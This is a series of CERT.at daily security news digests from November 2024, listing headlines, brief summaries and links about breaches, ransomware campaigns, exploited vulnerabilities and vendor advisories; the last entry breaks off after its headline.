=====================
= End-of-Day report =
=====================
Timeframe: Thursday 21-11-2024 18:00 − Friday 22-11-2024 18:00
Handler: Alexander Riepl
Co-Handler: Michael Schlagenhaufer
=====================
= News =
=====================
∗∗∗ Ransomgroup Helldown: Attacks on Zyxel Devices ∗∗∗
---------------------------------------------
SEC Consult has observed a rise of attacks on Zyxel firewalls over the past two months affecting Zyxel ATP firewall (version 5.38 and above - i.e. we have seen successful attacks also on fully patched Zyxel ATP version 5.39 firewalls). [..] We write this blogpost to highlight the need to remain vigilant and monitor activity on the Zyxel Firewalls, especially since there seems to be no official patch from the vendor as of the time of this blog post.
---------------------------------------------
https://sec-consult.com/blog/detail/ransomgroup-helldown-attacks-on-zyxel-d…
∗∗∗ Attacks on Citrix vulnerability observed ∗∗∗
---------------------------------------------
Last week, Citrix closed vulnerabilities in Session Recording. Now IT researchers have observed attacks on them.
---------------------------------------------
https://www.heise.de/-10100614
∗∗∗ Fintech Giant Finastra Investigating Data Breach ∗∗∗
---------------------------------------------
Finastra, which provides software and services to 45 of the world's top 50 banks, notified customers of the security incident after a cybercriminal began selling more than 400 gigabytes of data purportedly stolen from the company.
---------------------------------------------
https://it.slashdot.org/story/24/11/21/2043251/fintech-giant-finastra-inves…
∗∗∗ Here's what happens if you don't layer network security – or remove unused web shells ∗∗∗
---------------------------------------------
The US Cybersecurity and Infrastructure Agency often breaks into critical organizations' networks – with their permission, of course – to simulate real-world cyber attacks and thereby help improve their security. [..] In a Thursday blog post, the Agency (CISA) detailed the exercise and opined they "illuminate lessons learned for network defenders and software manufacturers about how to respond to and reduce risk." In other words: give it a read and learn from this critical infrastructure organization's mistakes – and the things it did well – to keep real criminals out of your IT environment.
---------------------------------------------
https://go.theregister.com/feed/www.theregister.com/2024/11/22/cisa_red_tea…
∗∗∗ Lateral Movement on macOS: Unique and Popular Techniques and In-the-Wild Examples ∗∗∗
---------------------------------------------
We uncover macOS lateral movement tactics, such as SSH key misuse and AppleScript exploitation. Strategies to counter this attack trend are also discussed.
---------------------------------------------
https://unit42.paloaltonetworks.com/unique-popular-techniques-lateral-movem…
∗∗∗ UK drinking water supplies disrupted by record number of undisclosed cyber incidents ∗∗∗
---------------------------------------------
A record number of cyber incidents impacted Britain’s critical drinking water supplies this year without being publicly disclosed, according to information obtained by Recorded Future News.
---------------------------------------------
https://therecord.media/uk-drinking-water-infrastructure-cyber-incident-rep…
∗∗∗ A Bag of RATs: VenomRAT vs. AsyncRAT ∗∗∗
---------------------------------------------
Remote access tools (RATs) have long been a favorite tool for cyber attackers, since they enable remote control over compromised systems and facilitate data theft, espionage, and continuous monitoring of victims. Among the well-known RATs are VenomRAT and AsyncRAT. [..] This comparison explores the core technical differences between VenomRAT and AsyncRAT by analyzing their architecture, capabilities, and tactics.
---------------------------------------------
https://www.rapid7.com/blog/post/2024/11/21/a-bag-of-rats-venomrat-vs-async…
∗∗∗ Looking at the Attack Surfaces of the Kenwood DMX958XR IVI ∗∗∗
---------------------------------------------
In our previous Kenwood DMX958XR blog post, we detailed the internals of the Kenwood in-vehicle infotainment (IVI) head unit and provided annotated pictures of each PCB. In this post, we aim to outline the attack surface of the DMX958XR in the hopes of providing inspiration for vulnerability research.
---------------------------------------------
https://www.thezdi.com/blog/2024/11/20/looking-at-the-attack-surfaces-of-th…
=====================
= Vulnerabilities =
=====================
∗∗∗ QNAP Security Advisories 2024-11-23 ∗∗∗
---------------------------------------------
QNAP released 8 security advisories: 5x important, 3x moderate
---------------------------------------------
https://www.qnap.com/en-us/security-advisories
∗∗∗ Security updates for Friday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (postgresql-13, postgresql-15, and webkit2gtk), Fedora (libsndfile, microcode_ctl, and trafficserver), Mageia (kanboard, kernel, kmod-xtables-addons, kmod-virtualbox, and bluez, kernel-linus, opendmarc, and radare2), Oracle (.NET 9.0, bubblewrap and flatpak, buildah, expat, firefox, grafana, grafana-pcp, kernel, krb5, libsoup, libvpx, NetworkManager-libreswan, openexr, pcp, python3.11, python3.11-urllib3, python3.12, python3.9, squid, thunderbird, tigervnc, and webkit2gtk3), Red Hat (.NET 9.0, binutils, expat, grafana-pcp, kernel, libsoup, NetworkManager-libreswan, openexr, python3.11, python3.12, python39:3.9, squid, tigervnc, and webkit2gtk3), SUSE (chromedriver, cobbler, govulncheck-vulndb, and icinga2), and Ubuntu (linux-lowlatency, linux-lowlatency-hwe-6.8, python2.7, and zbar).
---------------------------------------------
https://lwn.net/Articles/999102/
∗∗∗ ZDI-24-1605: Adobe InDesign JP2 File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability ∗∗∗
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-24-1605/
∗∗∗ ZDI-24-1606: 7-Zip CopyCoder Infinite Loop Denial-of-Service Vulnerability ∗∗∗
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-24-1606/
∗∗∗ ZDI-24-1613: Intel Driver & Support Assistant Log Folder Link Following Local Privilege Escalation Vulnerability ∗∗∗
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-24-1613/
∗∗∗ SSA-354569 V1.0: Multiple Vulnerabilities in Palo Alto Networks Virtual NGFW on RUGGEDCOM APE1808 Devices ∗∗∗
---------------------------------------------
https://cert-portal.siemens.com/productcert/html/ssa-354569.html
∗∗∗ NVIDIA affected by a Critical vulnerability CVE-2024-0138 ∗∗∗
---------------------------------------------
https://thecyberthrone.in/2024/11/22/nvidia-affected-by-a-critical-vulnerab…
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily
=====================
= End-of-Day report =
=====================
Timeframe: Wednesday 20-11-2024 18:00 − Thursday 21-11-2024 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Fortinet VPN design flaw hides successful brute-force attacks ∗∗∗
---------------------------------------------
A design flaw in the Fortinet VPN servers logging mechanism can be leveraged to conceal the successful verification of credentials during a brute-force attack without tipping off defenders of compromised logins.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/fortinet-vpn-design-flaw-hid…
∗∗∗ Due to security vulnerability: D-Link urges disposal of older routers ∗∗∗
---------------------------------------------
Several D-Link routers, some of which reached EOL status only a few months ago, are vulnerable. There are no patches.
---------------------------------------------
https://www.golem.de/news/wegen-sicherheitsluecke-d-link-draengt-auf-entsor…
∗∗∗ Lumma Stealer on the Rise: How Telegram Channels Are Fueling Malware Proliferation ∗∗∗
---------------------------------------------
Authored by: M. Mohanasundaram and Neil Tyagi. In today’s rapidly evolving cyber landscape, malware threats ..
---------------------------------------------
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/lumma-stealer-on-the-r…
∗∗∗ Azure Key Vault Tradecraft with BARK ∗∗∗
---------------------------------------------
This post details the existing and new functions in BARK that support adversarial tradecraft research relevant to the Azure Key Vault service. The latter part of the post shows an example of how a red team operator may use these commands during the course of an assessment.
---------------------------------------------
https://posts.specterops.io/azure-key-vault-tradecraft-with-bark-24163abc8d…
∗∗∗ “Free Hugs” – What to be Wary of in Hugging Face – Part 2 ∗∗∗
---------------------------------------------
Enjoy Threat Modeling? Try Threats in Models! Previously… In part 1 of this 4-part blog, we discussed Hugging Face, the potentially dangerous trust relationship between Hugging Face users and the ReadMe file, exploiting users who ..
---------------------------------------------
https://checkmarx.com/blog/free-hugs-what-to-be-wary-of-in-hugging-face-par…
∗∗∗ New Report Reveals Hidden Risks: How Internet-Exposed Systems Threaten Critical Infrastructure ∗∗∗
---------------------------------------------
A new Censys report found 145,000 exposed ICSs and thousands of insecure human-machine interfaces (HMIs), providing attackers with an accessible path to disrupt critical operations. Real-world examples underscore the danger, with Iranian and Russian-backed hackers exploiting HMIs to manipulate water systems in Pennsylvania and Texas. GreyNoise research ..
---------------------------------------------
https://www.greynoise.io/blog/new-report-reveals-hidden-risks-how-internet-…
∗∗∗ Finding Bugs in Chrome with CodeQL ∗∗∗
---------------------------------------------
This blog post discusses how to use a static analysis tool called CodeQL to search for vulnerabilities in Chrome.
---------------------------------------------
https://bughunters.google.com/blog/5085111480877056/finding-bugs-in-chrome-…
∗∗∗ Spelunking in Comments and Documentation for Security Footguns ∗∗∗
---------------------------------------------
Join us as we explore seemingly safe but deceptively tricky ground in Elixir, Python, and the Golang standard library. We cover officially documented, or at least previously discussed, code functionality that could unexpectedly introduce vulnerabilities. Well-documented behavior is not always what it appears!
---------------------------------------------
https://blog.includesecurity.com/2024/11/spelunking-in-comments-and-documen…
∗∗∗ Azure Detection Engineering: Log idiosyncrasies you should know about ∗∗∗
---------------------------------------------
We share a few inconsistencies found in Azure logs which make detection engineering more challenging.
---------------------------------------------
https://tracebit.com/blog/azure-detection-engineering-log-idiosyncrasies-yo…
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Thursday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (kernel, NetworkManager-libreswan, and openssl), Fedora (chromium and llvm-test-suite), Mageia (thunderbird), and Ubuntu (linux-aws-6.8, linux-azure, linux-azure-6.8, linux-oracle-6.8, linux-azure, and ruby2.7).
---------------------------------------------
https://lwn.net/Articles/998949/
∗∗∗ Progress Kemp LoadMaster OS Command Injection Vulnerability ∗∗∗
---------------------------------------------
FortiGuard network sensors detect attack attempts targeting the Progress Kemp LoadMaster. Successful exploitation of the CVE-2024-1212 vulnerability allows unauthenticated remote attackers to access the system through the management interface, potentially leading to data breaches, service disruptions, or further attacks.
---------------------------------------------
https://fortiguard.fortinet.com/outbreak-alert/kemp-loadmaster-os-command-i…
∗∗∗ ZDI-24-1532: 7-Zip Zstandard Decompression Integer Underflow Remote Code Execution Vulnerability ∗∗∗
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-24-1532/
∗∗∗ Drupal core - Moderately critical - Gadget chain - SA-CORE-2024-008 ∗∗∗
---------------------------------------------
https://www.drupal.org/sa-core-2024-008
∗∗∗ Drupal core - Moderately critical - Gadget chain - SA-CORE-2024-007 ∗∗∗
---------------------------------------------
https://www.drupal.org/sa-core-2024-007
∗∗∗ Drupal core - Critical - Cross Site Scripting - SA-CORE-2024-005 ∗∗∗
---------------------------------------------
https://www.drupal.org/sa-core-2024-005
∗∗∗ Drupal core - Moderately critical - Access bypass - SA-CORE-2024-004 ∗∗∗
---------------------------------------------
https://www.drupal.org/sa-core-2024-004
∗∗∗ Drupal core - Moderately critical - Cross Site Scripting - SA-CORE-2024-003 ∗∗∗
---------------------------------------------
https://www.drupal.org/sa-core-2024-003
=====================
= End-of-Day report =
=====================
Timeframe: Tuesday 19-11-2024 18:00 − Wednesday 20-11-2024 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Bigger and badder: how DDoS attack sizes have evolved over the last decade ∗∗∗
---------------------------------------------
If we plot the metrics associated with large DDoS attacks observed in the last 10 years, does it show a straight, steady increase in an exponential curve that keeps becoming steeper, or is it closer to a linear growth? Our analysis found the growth is not linear but rather is exponential, with the slope varying depending on the metric (rps, pps or bps).
---------------------------------------------
https://blog.cloudflare.com/bigger-and-badder-how-ddos-attack-sizes-have-ev…
∗∗∗ No attack on Idev portal: Destatis denies blame for data leak ∗∗∗
---------------------------------------------
The Federal Statistical Office has examined its Idev portal. The data captured by hackers is said to have leaked from the reporting companies themselves.
---------------------------------------------
https://www.golem.de/news/kein-cyberangriff-auf-meldesystem-destatis-weist-…
∗∗∗ Inside the Threat: A look behind the scenes at defending against an active threat ∗∗∗
---------------------------------------------
Early detection and proactive investigation can nip a ransomware attack in the bud. A recent real-world case shows how it works.
---------------------------------------------
https://sec-consult.com/de/blog/detail/inside-the-threat-ein-blick-hinter-d…
∗∗∗ Decades-Old Security Vulnerabilities Found in Ubuntu's Needrestart Package ∗∗∗
---------------------------------------------
Multiple decade-old security vulnerabilities have been disclosed in the needrestart package installed by default in Ubuntu Server (since version 21.04) that could allow a local attacker to gain root privileges without requiring user ..
---------------------------------------------
https://thehackernews.com/2024/11/decades-old-security-vulnerabilities.html
∗∗∗ Yubikey side channel: Further products vulnerable to cloning attack ∗∗∗
---------------------------------------------
The side-channel vulnerability EUCLEAK also became known as the "Yubikey cloning attack". The BSI is re-certifying updated products that were affected.
---------------------------------------------
https://www.heise.de/news/EUCLEAK-Weitere-Produkte-fuer-Cloning-Attacke-anf…
∗∗∗ Threat Assessment: Ignoble Scorpius, Distributors of BlackSuit Ransomware ∗∗∗
---------------------------------------------
Explore this assessment on cybercrime group Ignoble Scorpius, distributors of BlackSuit ransomware. Since May 2023, operations have increased, affecting critical sectors.
---------------------------------------------
https://unit42.paloaltonetworks.com/threat-assessment-blacksuit-ransomware-…
∗∗∗ Looking at the Internals of the Kenwood DMX958XR IVI ∗∗∗
---------------------------------------------
For the upcoming Pwn2Own Automotive contest, a total of four in-vehicle infotainment (IVI) head units have been selected as targets. One of these is the double DIN Kenwood DMX958XR. This unit offers a variety of ..
---------------------------------------------
https://www.thezdi.com/blog/2024/11/18/looking-at-the-internals-of-the-kenw…
∗∗∗ Critical Vulnerabilities in vCenter Server Exploited in the Wild ∗∗∗
---------------------------------------------
CVE: CVE-2024-38813, CVE-2024-38812. Affected Products: VMware vCenter Server, VMware Cloud Foundation. Exploitation: Broadcom has confirmed exploitation of these vulnerabilities[1]. The CVE has not been ..
---------------------------------------------
https://www.truesec.com/hub/blog/critical-vulnerabilities-in-vcenter-server…
∗∗∗ Malicious QR Codes: How big of a problem is it, really? ∗∗∗
---------------------------------------------
QR codes are disproportionately effective at bypassing most anti-spam filters. Talos discovered two effective methods for defanging malicious QR codes, a necessary step to make them safe for consumption.
---------------------------------------------
https://blog.talosintelligence.com/malicious_qr_codes/
∗∗∗ Hackers Exploit Misconfigured Jupyter Servers for Illegal Sports Streaming ∗∗∗
---------------------------------------------
Aqua Nautilus’ research reveals hackers are leveraging vulnerable and misconfigured Jupyter Notebook servers to steal live sports streams.
---------------------------------------------
https://hackread.com/hackers-exploit-misconfigured-jupyter-servers-sports-s…
∗∗∗ Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474 ∗∗∗
---------------------------------------------
It'll be no surprise that 2024, 2023, 2022, and every other year of humanity's existence has been tough for SSLVPN appliances. Anyhow, there are new vulnerabilities (well, two of them) that are being exploited in the Palo Alto Networks ..
---------------------------------------------
https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve…
∗∗∗ Defending Your Directory: An Expert Guide to Mitigating Pass-the-Hash Attacks in Active Directory ∗∗∗
---------------------------------------------
In our latest technical blog series, our DFIR team are highlighting the most prominent Active Directory (AD) threats, describing the tell-tale signs that your AD might be at risk, and give experienced insight into the best prevention and mitigation strategies to shore up your AD security and bolster your digital identity protection.
---------------------------------------------
https://www.nccgroup.com/us/research-blog/defending-your-directory-an-exper…
∗∗∗ Let’s Encrypt: Ten Years ∗∗∗
---------------------------------------------
Vital personal and business information flows over the Internet more frequently than ever, and we don’t always know when it’s happening. It’s clear at this point that encrypting is something all of us should be doing. Then why don’t we use TLS (the successor to SSL) everywhere? Every browser in every device supports it. Every server in every data center supports it. Why don’t we just flip the switch?
---------------------------------------------
https://letsencrypt.org/2014/11/18/announcing-lets-encrypt/
∗∗∗ Achieving NIST CSF 2.0 Compliance: Best Practices ∗∗∗
---------------------------------------------
Cybersecurity is an ever-growing concern in today’s digital era. With the rise of cyberattacks and data breaches, organizations must adopt best practices to safeguard their sensitive information. One of the leading frameworks guiding organizations in securing their digital assets is the NIST CSF 2.0 by National Institute of Standards and ..
---------------------------------------------
https://fortbridge.co.uk/regulations/achieving-nist-csf-2-0-compliance-with…
=====================
= Vulnerabilities =
=====================
∗∗∗ DSA-5815-1 needrestart - security update ∗∗∗
---------------------------------------------
https://lists.debian.org/debian-security-announce/2024/msg00229.html
=====================
= End-of-Day report =
=====================
Timeframe: Monday 18-11-2024 18:00 − Tuesday 19-11-2024 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Spotify abused to promote pirated software and game cheats ∗∗∗
---------------------------------------------
Spotify playlists and podcasts are being abused to push pirated software, game cheat codes, spam links, and "warez" sites. By injecting targeted keywords and links in playlist names and podcast descriptions, threat actors may ..
---------------------------------------------
https://www.bleepingcomputer.com/news/security/spotify-abused-to-promote-pi…
∗∗∗ New Helldown Ransomware Variant Expands Attacks to VMware and Linux Systems ∗∗∗
---------------------------------------------
Cybersecurity researchers have shed light on a Linux variant of a relatively new ransomware strain called Helldown, suggesting that the threat actors are broadening their attack focus. "Helldown deploys Windows ransomware derived from the LockBit 3.0 code," Sekoia ..
---------------------------------------------
https://thehackernews.com/2024/11/new-helldown-ransomware-expands-attacks.h…
∗∗∗ Critical 9.8-rated VMware vCenter RCE bug exploited after patch fumble ∗∗∗
---------------------------------------------
If you didn't fix this a month ago, your to-do list probably needs a reshuffle. Two VMware vCenter server bugs, including a critical heap-overflow vulnerability that leads to remote code execution (RCE), have been exploited in attacks after Broadcom’s first attempt to fix the flaws fell short.
---------------------------------------------
https://www.theregister.com/2024/11/18/vmware_vcenter_rce_exploited/
∗∗∗ Veritas Enterprise Vault: Critical code-injection vulnerabilities in archiving software ∗∗∗
---------------------------------------------
In Veritas Enterprise Vault, attackers can abuse critical vulnerabilities to inject malicious code.
---------------------------------------------
https://www.heise.de/news/Veritas-Enterprise-Vault-Kritische-Codeschmuggel-…
∗∗∗ Critical Palo Alto vulnerability: Details and patches are out, CISA warns of exploitation ∗∗∗
---------------------------------------------
Almost three weeks after the first exploit rumors, the vendor has finally reacted, but is playing tricks. Meanwhile, the US cyber agency warns of attacks.
---------------------------------------------
https://www.heise.de/news/Kritische-Palo-Alto-Luecke-Patches-sind-da-CISA-w…
∗∗∗ FreeBSD Foundation releases Bhyve and Capsicum security audit ∗∗∗
---------------------------------------------
The FreeBSD Foundation has announced the release of a security audit report conducted by security firm Synacktiv. The audit uncovered a number of vulnerabilities: Most of these vulnerabilities have been addressed through official FreeBSD Project security advisories, which offer detailed information about each vulnerability, its impact, and the measures ..
---------------------------------------------
https://lwn.net/Articles/998615/
∗∗∗ FrostyGoop’s Zoom-In: A Closer Look into the Malware Artifacts, Behaviors and Network Communications ∗∗∗
---------------------------------------------
We analyze FrostyGoop malware, which targets OT systems. This article walks through newly discovered samples, indicators, and also examines configurations and network communications.
---------------------------------------------
https://unit42.paloaltonetworks.com/frostygoop-malware-analysis/
∗∗∗ The Importance of Establishing a Solid Third Party Risk Management Framework for Risk Mitigation ∗∗∗
---------------------------------------------
In the previous post, we introduced the concept of Third-Party Risk Management (TPRM) and its importance in today’s interconnected world. Now, let us have a look at the practical aspects of building a solid TPRM program and why it is important for your company. 1. Start with a Third-Party Inventory: The first step in building ..
---------------------------------------------
https://blog.nviso.eu/2024/11/19/the-importance-of-establishing-a-solid-thi…
∗∗∗ Facebook Malvertising Campaign Spreads Malware via Fake Bitwarden ∗∗∗
---------------------------------------------
A Facebook malvertising campaign disguised as Bitwarden updates spreads malware, targeting business accounts. Users are tricked ..
---------------------------------------------
https://hackread.com/facebook-malvertising-malware-via-fake-bitwarden/
∗∗∗ Threat Actors Hijack Misconfigured Servers for Live Sports Streaming ∗∗∗
---------------------------------------------
To keep up with the ever-evolving world of cybersecurity, Aqua Nautilus researchers deploy honeypots that mimic real-world development environments. During a recent threat-hunting operation, they uncovered a surprising new ..
---------------------------------------------
https://blog.aquasec.com/threat-actors-hijack-misconfigured-servers-for-liv…
∗∗∗ Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474 ∗∗∗
---------------------------------------------
Note: Since this is breaking news and more details are being released, we're updating this ..
---------------------------------------------
https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve…
∗∗∗ NVD Backlog Tops 20,000 CVEs Awaiting Analysis as NIST Prepares System Updates ∗∗∗
---------------------------------------------
CVEs awaiting analysis by the NVD have broken the 20,000 mark, after the security community noticed its enrichment activity slowed to nearly a halt again last week. NIST failed to meet its self-imposed deadline of ..
---------------------------------------------
https://socket.dev/blog/nvd-backlog-tops-20-000-cves
∗∗∗ Threat Actor Exposes Playbook for Exploiting npm to Build Blockchain-Powered Botnets ∗∗∗
---------------------------------------------
In October 2024, Socket discovered a widespread npm malware campaign using Ethereum smart contracts to evade detection and maintain control over infected systems. Building on our initial research and equipped with analyses of the ..
---------------------------------------------
https://socket.dev/blog/exploiting-npm-to-build-a-blockchain-powered-botnet
∗∗∗ Extending Burp Suite for fun and profit – The Montoya way – Part 7 ∗∗∗
---------------------------------------------
Last time we saw how to develop an extension that will add custom active and passive checks to the Burp Scanner. Today we will modify that extension to detect serialization issues using ..
---------------------------------------------
https://security.humanativaspa.it/extending-burp-suite-for-fun-and-profit-t…
∗∗∗ U.S. Extradites and Charges Alleged Phobos Ransomware Admin ∗∗∗
---------------------------------------------
The United States secured the extradition of a Russian national from South Korea who is allegedly the mastermind behind the notorious Phobos ransomware. Evgenii Ptitsyn, 42, is accused of administering the Phobos ..
---------------------------------------------
https://thecyberexpress.com/us-charges-alleged-phobos-ransomware-admin/
=====================
= Vulnerabilities =
=====================
∗∗∗ ZDI-24-1516: Trend Micro Deep Security Agent Manual Scan Command Injection Remote Code Execution Vulnerability ∗∗∗
---------------------------------------------
This vulnerability allows remote attackers to execute arbitrary code on affected installations of Trend Micro Deep Security Agent. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.5. The following CVEs are assigned: CVE-2024-51503.
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-24-1516/
∗∗∗ ZDI-24-1517: McAfee Total Protection Uncontrolled Search Path Element Local Privilege Escalation Vulnerability ∗∗∗
---------------------------------------------
This vulnerability allows local attackers to escalate privileges on affected installations of McAfee Total Protection. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 6.7. The following CVEs are assigned: CVE-2024-49592.
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-24-1517/
∗∗∗ Security updates for Tuesday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (.NET 9.0, bcc, bluez, bpftrace, bubblewrap, flatpak, buildah, cockpit, containernetworking-plugins, cups, cyrus-imapd, edk2, expat, firefox, fontforge, gnome-shell, gnome-shell-extensions, grafana, grafana-pcp, gtk3, httpd, iperf3, jose, krb5, libgcrypt, libsoup, libvirt, libvpx, lldpd, microcode_ctl, ..
---------------------------------------------
https://lwn.net/Articles/998755/
∗∗∗ Oracle Security Alert for CVE-2024-21287 - 18 November 2024 ∗∗∗
---------------------------------------------
https://www.oracle.com/security-alerts/alert-cve-2024-21287.html
=====================
= End-of-Day report =
=====================
Timeframe: Friday 15-11-2024 18:00 − Monday 18-11-2024 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Honeypot: Researcher fools script kiddies with fake ransomware ∗∗∗
---------------------------------------------
A tool called Jinn was supposed to simplify ransomware attacks. In fact, it was a honeypot that quite a few actors fell for.
---------------------------------------------
https://www.golem.de/news/honeypot-forscher-veralbert-scriptkiddies-mit-fak…
∗∗∗ Women In Russian-Speaking Cybercrime: Mythical Creatures or Significant Members of Underground? ∗∗∗
---------------------------------------------
A blog detailing in-depth research into women in Russian-speaking cybercrime.
---------------------------------------------
https://www.sans.org/blog/women-in-russian-speaking-cybercrime-mythical-cre…
∗∗∗ Mastering DORA core topics: A deep dive into incident management ∗∗∗
---------------------------------------------
In this blog post, we look at the requirements for DORA incident management.
---------------------------------------------
https://sec-consult.com/de/blog/detail/dora-kernthemen-meistern-ein-deep-di…
∗∗∗ Swiss cheesed off as postal service used to spread malware ∗∗∗
---------------------------------------------
QR codes arrive via an age-old delivery system. Switzerland's National Cyber Security Centre (NCSC) has issued an alert about malware being spread via the country's postal service.
---------------------------------------------
https://www.theregister.com/2024/11/16/swiss_malware_qr/
∗∗∗ WTF: Security researchers find three new vulnerabilities while reproducing one ∗∗∗
---------------------------------------------
When the watchTowr Labs researchers set out to verify the vulnerability in FortiManager, they found further bugs and incomplete fixes.
---------------------------------------------
https://www.heise.de/news/Sicherheitsforscher-finden-beim-Nachstellen-einer…
∗∗∗ T-Mobile affected by Chinese cyberattack ∗∗∗
---------------------------------------------
According to a report, the hackers were able to penetrate several telecommunications companies in the USA as well as internationally.
---------------------------------------------
https://www.derstandard.at/story/3000000245232/t-mobile-von-chinesischem-cy…
∗∗∗ Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012 ∗∗∗
---------------------------------------------
We detail the observed limited activity regarding authentication bypass vulnerability CVE-2024-0012 affecting specific versions of PAN-OS software, and include protections and mitigations.
---------------------------------------------
https://unit42.paloaltonetworks.com/cve-2024-0012-cve-2024-9474/
∗∗∗ Acute wave of DDoS attacks against Austrian companies and organisations ∗∗∗
---------------------------------------------
Since early this morning, various Austrian companies and organisations from different industries and sectors have been confronted with DDoS attacks. The exact background of the attack is currently unknown to us, but there are indications of a hacktivist motivation. In view of the current events ..
---------------------------------------------
https://www.cert.at/de/aktuelles/2024/11/ddos-angriffe-november-2024
∗∗∗ BrazenBamboo Weaponizes FortiClient Vulnerability to Steal VPN Credentials via DEEPDATA ∗∗∗
---------------------------------------------
KEY TAKEAWAYS: Volexity discovered and reported a vulnerability in Fortinet's Windows VPN client, FortiClient, where user credentials remain in process memory after a user authenticates to the VPN. This vulnerability was abused by BrazenBamboo in their DEEPDATA malware. BrazenBamboo is the threat actor behind development of the ..
---------------------------------------------
https://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlien…
∗∗∗ Inside Water Barghest’s Rapid Exploit-to-Market Strategy for IoT Devices ∗∗∗
---------------------------------------------
In this blog entry, we discuss Water Barghest's exploitation of IoT devices, transforming them into profitable assets through advanced automation and monetization techniques.
---------------------------------------------
https://www.trendmicro.com/en_us/research/24/k/water-barghest.html
∗∗∗ What To Use Instead of PGP ∗∗∗
---------------------------------------------
It’s been more than five years since The PGP Problem was published, and I still hear from people who believe that using PGP (whether GnuPG or another OpenPGP implementation) is a thing ..
---------------------------------------------
https://soatok.blog/2024/11/15/what-to-use-instead-of-pgp/
∗∗∗ TPM-Backed SSH Keys on Windows 11 ∗∗∗
---------------------------------------------
On my MacBook, I’ve been using TPM/security key-based SSH keys for years since it’s where I do the most development and the software support is good. Secretive is a decent app I can vouch for. Before that, I was ..
---------------------------------------------
https://cedwards.xyz/tpm-backed-ssh-keys-on-windows-11/
∗∗∗ Reverse Engineering iOS 18 Inactivity Reboot ∗∗∗
---------------------------------------------
iOS 18 introduced a new inactivity reboot security feature. What does it protect from and how does it work? This blog post covers all the details down to a kernel extension and the Secure Enclave Processor.
---------------------------------------------
https://naehrdine.blogspot.com/2024/11/reverse-engineering-ios-18-inactivit…
∗∗∗ Malicious npm Package Exploits WhatsApp Authentication with Remote Kill Switch for File Destruction ∗∗∗
---------------------------------------------
A malicious npm package disguised as a WhatsApp client is exploiting authentication flows with a remote kill switch to exfiltrate data and destroy files.
---------------------------------------------
https://socket.dev/blog/malicious-npm-package-exploits-whatsapp-authenticat…
∗∗∗ Redis CVE-2024-31449: How to Reproduce and Mitigate the Vulnerability ∗∗∗
---------------------------------------------
On October 7, 2024, information about a serious vulnerability in Redis, identified as CVE-2024-31449, was published. This vulnerability allows an authenticated user to execute remote code using specially ..
---------------------------------------------
https://redrays.io/blog/redis-cve-2024-31449-how-to-reproduce-and-mitigate-…
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Monday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (binutils, libsoup, squid:4, tigervnc, and webkit2gtk3), Debian (icinga2, postgresql-13, postgresql-15, smarty3, symfony, thunderbird, and waitress), Fedora (dotnet9.0, ghostscript, microcode_ctl, php-bartlett-PHP-CompatInfo, python-waitress, and webkitgtk), Gentoo (Perl, Pillow, and X.Org X server, XWayland), ..
---------------------------------------------
https://lwn.net/Articles/998570/
∗∗∗ CVE-2024-0012 PAN-OS: Authentication Bypass in the Management Web Interface (PAN-SA-2024-0015) (Severity: CRITICAL) ∗∗∗
---------------------------------------------
https://security.paloaltonetworks.com/CVE-2024-0012
∗∗∗ CVE-2024-9474 PAN-OS: Privilege Escalation (PE) Vulnerability in the Web Management Interface (Severity: MEDIUM) ∗∗∗
---------------------------------------------
https://security.paloaltonetworks.com/CVE-2024-9474
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily
=====================
= End-of-Day report =
=====================
Timeframe: Donnerstag 14-11-2024 18:00 − Freitag 15-11-2024 18:00
Handler: Alexander Riepl
Co-Handler: Michael Schlagenhaufer
=====================
= News =
=====================
∗∗∗ These dumb passwords are the most commonly used ∗∗∗
---------------------------------------------
Are your accounts well protected? Take a look at this list, just to be safe - hopefully you won't feel caught out.
---------------------------------------------
https://futurezone.at/digital-life/dumme-passwoerter-oesterreich-internatio…
∗∗∗ Cyberattack on Destatis: Hackers capture company data from the Federal Statistical Office ∗∗∗
---------------------------------------------
The 3.8 GByte dataset provides access to information reported by companies. The attacked system had only recently been modernised.
---------------------------------------------
https://www.golem.de/news/cyberangriff-auf-destatis-hacker-erbeuten-firmend…
∗∗∗ macOS 15.1: Apple's update breaks third-party firewalls ∗∗∗
---------------------------------------------
Anyone using third-party firewalls such as Little Snitch under macOS 15.1 may run into problems. Depending on the configuration, filter rules remain ineffective.
---------------------------------------------
https://www.golem.de/news/macos-15-1-apple-patcht-drittanbieter-firewalls-k…
∗∗∗ New Glove Stealer Malware Bypasses Google Chrome’s App-Bound to Steal Data ∗∗∗
---------------------------------------------
